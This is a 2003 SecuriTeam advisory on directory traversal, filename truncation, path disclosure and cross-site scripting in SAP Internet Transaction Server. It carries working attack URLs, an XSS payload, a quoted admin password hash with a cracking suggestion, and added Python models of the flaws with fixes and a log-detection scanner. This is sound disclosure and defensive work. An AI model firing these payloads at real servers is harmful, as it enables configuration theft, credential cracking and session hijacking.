[NEWS] SAP Internet Transaction Server Multiple Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 09/02/03

    To: list@securiteam.com
    Date: 2 Sep 2003 15:37:11 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      SAP Internet Transaction Server Multiple Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

    SAP Internet Transaction Server (ITS) has been found to contain the following vulnerabilities:
     - Path/Information Disclosure
     - Directory Traversal
     - Filename Truncation
     - Arbitrary File Disclosure
     - Cross Site Scripting/Cookie Theft

    DETAILS

    Vulnerable systems:
     * ITS version 4620.2.0.323011 build 46B.323011

    Path/information disclosure:
    Insufficient validation of user-supplied input, and of the error output
    built from it, allows non-existent values to be passed in the following
    request parameters:
    ~service
    ~templatelanguage
    ~language
    ~theme
    ~template

    Each produces an error message that may disclose sensitive information:
    the operating system, the software version and the directory structure
    of the attacked server.

    Example:
    http://www.server.name/scripts/wgate/pbw2/!?

    With the following parameters:
    ~runtimemode=DM&
    ~language=en&
    ~theme=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&

    Remarks:
    "~template" may be an undocumented or forgotten variable.

    Arbitrary file disclosure (Directory Traversal / File Truncation):
    Example:
    http://www.server.name/scripts/wgate/pbw2/!?

    With the following parameters:
    ~language=en&
    ~runtimemode=DM&
    ~templatelanguage=&
    ~language=en&
    ~theme=..\..&
    ~template=services\global.srvc++++++++++++++++++++++++++++++++++++++++++++++++++++++
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    +++++++++++++++++++++++++++++++++++++++++++++++++++

    (Where "+" stands for spaces "%20" URI encoded).
    The above example causes the server to return the global server
    configuration file "global.srvc" on a default ITS installation.

    Normally the default template extension ".html" is appended to the
    assembled template path. The code apparently guards against a buffer
    overflow by truncating the result once it exceeds a fixed length; with
    enough trailing padding the appended ".html" falls beyond that length
    and is shed, so the attacker-chosen file name is used as-is.

    Occasionally the server responds with an error message instead of the
    requested file. This may depend on additional HTTP request headers
    sent with the request.
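    The truncation behaviour described above, modelled as an added example
    (this is neither ITS code nor code from the advisory): vulnerable_resolve()
    assembles the template path the way the advisory implies, appends ".html"
    and then silently cuts the whole string to a fixed buffer, while
    safe_resolve() rejects traversal, padding and over-long input instead of
    truncating. The template root, the buffer size and the service/theme layout
    are assumed. The final rstrip() models Win32 ignoring trailing spaces and
    dots in a file name, which is my inference about why the long run of %20
    padding works; the advisory itself does not state it.

```python
import ntpath

# Assumed layout and limits; neither is taken from the advisory.
TEMPLATE_ROOT = r"C:\ITS\templates"   # hypothetical template directory
PATH_BUF = 128                        # hypothetical fixed-size path buffer
DEFAULT_EXT = ".html"                 # the extension the advisory says ITS appends


def vulnerable_resolve(service: str, theme: str, template: str) -> str:
    """Model of the flawed resolution the advisory describes.

    The path is assembled from user input, the default extension is
    appended, and the result is silently cut to PATH_BUF characters.
    """
    full = ntpath.join(TEMPLATE_ROOT, service, theme, template) + DEFAULT_EXT
    truncated = full[:PATH_BUF]
    # What the OS finally opens: Win32 ignores trailing spaces and dots in a
    # file name (platform assumption, see lead-in) and resolves "..".
    return ntpath.normpath(truncated.rstrip(" ."))


def padding_needed(service: str, theme: str, template: str) -> int:
    """Spaces an attacker must append so that the whole ".html" suffix falls
    outside the buffer; explains the long %20 run in the advisory's request."""
    base = ntpath.join(TEMPLATE_ROOT, service, theme, template)
    return max(0, PATH_BUF - len(base))


def safe_resolve(service: str, theme: str, template: str) -> str:
    """Hardened variant: validate each component, never truncate, and
    verify the final path stays below TEMPLATE_ROOT."""
    for part in (service, theme, template):
        if (not part
                or part != ntpath.basename(part)      # separator or drive letter inside
                or part in (".", "..")
                or part != part.rstrip(" .")          # trailing space/dot tricks
                or "\0" in part):
            raise ValueError(f"invalid path component: {part!r}")
    full = ntpath.join(TEMPLATE_ROOT, service, theme, template + DEFAULT_EXT)
    if len(full) > PATH_BUF:
        raise ValueError("path too long")            # fail closed, do not truncate
    resolved = ntpath.normpath(full)
    root = ntpath.normpath(TEMPLATE_ROOT) + "\\"
    if not resolved.startswith(root):
        raise ValueError("path escapes template root")
    return resolved


if __name__ == "__main__":
    attack = "services\\global.srvc" + " " * 200
    print(vulnerable_resolve("pbw2", "..\\..", attack))   # C:\ITS\services\global.srvc
    print(vulnerable_resolve("pbw2", "dm", "login"))       # C:\ITS\templates\pbw2\dm\login.html
    print(padding_needed("pbw2", "..\\..", "services\\global.srvc"))  # 80
    try:
        safe_resolve("pbw2", "..\\..", attack)
    except ValueError as exc:
        print("rejected:", exc)
```

    Note that a short run of padding is not enough: if ".html" still fits in
    the buffer it survives, and the request fails, which is why the advisory's
    example carries well over a hundred encoded spaces.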

    Remarks:
    The global configuration file "global.srvc" contains the administrative
    login and its DES-encrypted password:
    ~password des26(2c94f116f4393f3d)
    ~login Master

    A good DES cracker should be able to recover this password by wordlist
    or brute-force attack.

    Cross Site Scripting/Cookie Theft:
    Insufficient validation of user-supplied parameters, which are reflected
    into the response unescaped, allows injection of HTML and client-side
    script.

    Example:
    http://www.server.name/scripts/wgate.dll?

    With the following parameters:
    ~service=--><img%09src=javascript:alert(1)%3bcrap

    Remarks:
    Because ITS relies heavily on cookies for session and state management,
    cookie theft through injected script is the likely impact. Other
    parameters may also reflect HTML/script tags.
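    The payload above, worked through as an added example (not code from the
    advisory or from SAP): vulnerable_render() reflects ~service verbatim into
    an HTML comment and an error message, which is the context the leading
    "-->" of the payload targets; blocklist_render() shows why filtering a few
    literal tag strings fails, since %09 (tab) is a valid attribute separator
    and a javascript: URL needs no event handler; safe_render() applies HTML
    output encoding. The page markup is assumed, the advisory shows only the
    parameter and the payload.

```python
import html
import re
from urllib.parse import unquote

# The advisory's payload, URL-decoded: a tab sits between "img" and "src".
PAYLOAD = unquote("--><img%09src=javascript:alert(1)%3bcrap")


def vulnerable_render(service: str) -> str:
    """Hypothetical ITS error page that reflects ~service unescaped, first
    inside an HTML comment and then in the visible text."""
    return (f"<!-- ~service={service} -->\n"
            f"<b>Service {service} not found</b>")


def blocklist_render(service: str) -> str:
    """Insufficient fix: reject a few literal tag strings. The tab separator
    defeats '<img src' and the javascript: URL needs no on* handler."""
    lowered = service.lower()
    for needle in ("<script", "<img src", "onerror=", "onload="):
        if needle in lowered:
            return "<b>Invalid service name</b>"
    return vulnerable_render(service)


def safe_render(service: str) -> str:
    """Contextual output encoding: every reflected copy is HTML-escaped;
    quote=True also covers attribute contexts."""
    esc = html.escape(service, quote=True)
    return (f"<!-- ~service={esc} -->\n"
            f"<b>Service {esc} not found</b>")


# \s matches the tab, exactly as a browser's tokenizer treats it.
TAG_RE = re.compile(r"<img\s+src\s*=\s*javascript:", re.I)


def injected_tag(page: str) -> bool:
    """True if the payload survived as a parsable <img src=javascript:...> tag."""
    return TAG_RE.search(page) is not None


if __name__ == "__main__":
    for name, render in (("vulnerable", vulnerable_render),
                         ("blocklist", blocklist_render),
                         ("escaped", safe_render)):
        print(f"{name:10s} injected={injected_tag(render(PAYLOAD))}")
```

    Reflecting request data into an HTML comment at all is the underlying
    mistake; escaping makes it harmless here, but the robust fix is not to
    echo the parameter into markup where it serves no purpose.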

    Vendor Status:
    The vendor was contacted on 02.08.2003 and has issued patches.

    Vendor Patches:
    SAP recommends consulting SAP Notes (advices) 598074, 595383 and 654038.
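    Until the notes above are applied, the requests described in this advisory
    can be spotted in web-server logs. The following is an added example, not
    part of the advisory and not SAP tooling: a scanner over constructed
    IIS-style (W3C) log lines that flags the probe patterns from all three
    sections, i.e. traversal in any ~ parameter, a run of trailing %20 padding
    on a value, an over-long value such as the ~theme in the information
    disclosure example, and script in ~service. The field layout, the ITS path
    pattern and the length thresholds are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed log lines in the layout: date time c-ip cs-method cs-uri-stem
# cs-uri-query sc-status. They are not real ITS logs; the queries mirror the
# advisory's examples plus a benign request and a non-ITS request.
SAMPLE_LOG = [
    "2003-09-02 13:37:01 10.0.0.5 GET /scripts/wgate/pbw2/! "
    "~runtimemode=DM&~language=en&~theme=dm&~template=login 200",
    "2003-09-02 13:37:02 10.0.0.5 GET /scripts/wgate/pbw2/! "
    "~runtimemode=DM&~language=en&~theme=" + "x" * 35 + " 500",
    "2003-09-02 13:37:03 10.0.0.5 GET /scripts/wgate/pbw2/! "
    "~language=en&~runtimemode=DM&~templatelanguage=&~theme=..\\..&"
    "~template=services\\global.srvc" + "+" * 60 + " 200",
    "2003-09-02 13:37:04 10.0.0.5 GET /scripts/wgate.dll "
    "~service=--><img%09src=javascript:alert(1)%3bcrap 200",
    "2003-09-02 13:37:05 10.0.0.9 GET /index.html - 200",
]

ITS_STEM = re.compile(r"/wgate(\.dll|/)", re.I)          # both URL forms in the advisory
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")        # ..\ or ../ as a path step
SCRIPT = re.compile(r"<|javascript:|vbscript:|\bon\w+\s*=", re.I)
MAX_VALUE = 32     # assumed: legitimate ITS values are short identifiers
MIN_PADDING = 8    # assumed: this many trailing spaces is never accidental


def classify(query: str) -> set:
    """Return the set of rule names tripped by one cs-uri-query string."""
    findings = set()
    if query in ("", "-"):
        return findings
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if not name.startswith("~"):
            continue
        for raw in values:
            value = unquote(raw)          # second pass catches double encoding (%252e)
            if TRAVERSAL.search(value):
                findings.add("traversal")
            if len(value) - len(value.rstrip(" ")) >= MIN_PADDING:
                findings.add("extension_truncation")
            if len(value) > MAX_VALUE:
                findings.add("overlong_value")
            if SCRIPT.search(value):
                findings.add("script_injection")
    return findings


def parse_line(line: str):
    """Split one whitespace-delimited log line into the fields we need."""
    fields = line.split()
    if len(fields) < 7:
        return None
    date, time, client, method, stem, query, status = fields[:7]
    return {"time": f"{date} {time}", "client": client, "method": method,
            "stem": stem, "query": query, "status": status}


def scan(lines):
    """Return (client, stem, findings) for every ITS request that trips a rule."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not ITS_STEM.search(rec["stem"]):
            continue
        findings = classify(rec["query"])
        if findings:
            hits.append((rec["client"], rec["stem"], findings))
    return hits


if __name__ == "__main__":
    for client, stem, findings in scan(SAMPLE_LOG):
        print(client, stem, sorted(findings))
```

    The rules deliberately decode the query twice, since the padding in the
    advisory arrives as "+" or "%20" and traversal may arrive double-encoded;
    tune MAX_VALUE against a sample of legitimate requests before alerting on
    the over-long rule alone.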

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:martin@websec.org> Martin
    Eiszner of SEC-CONSULT.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

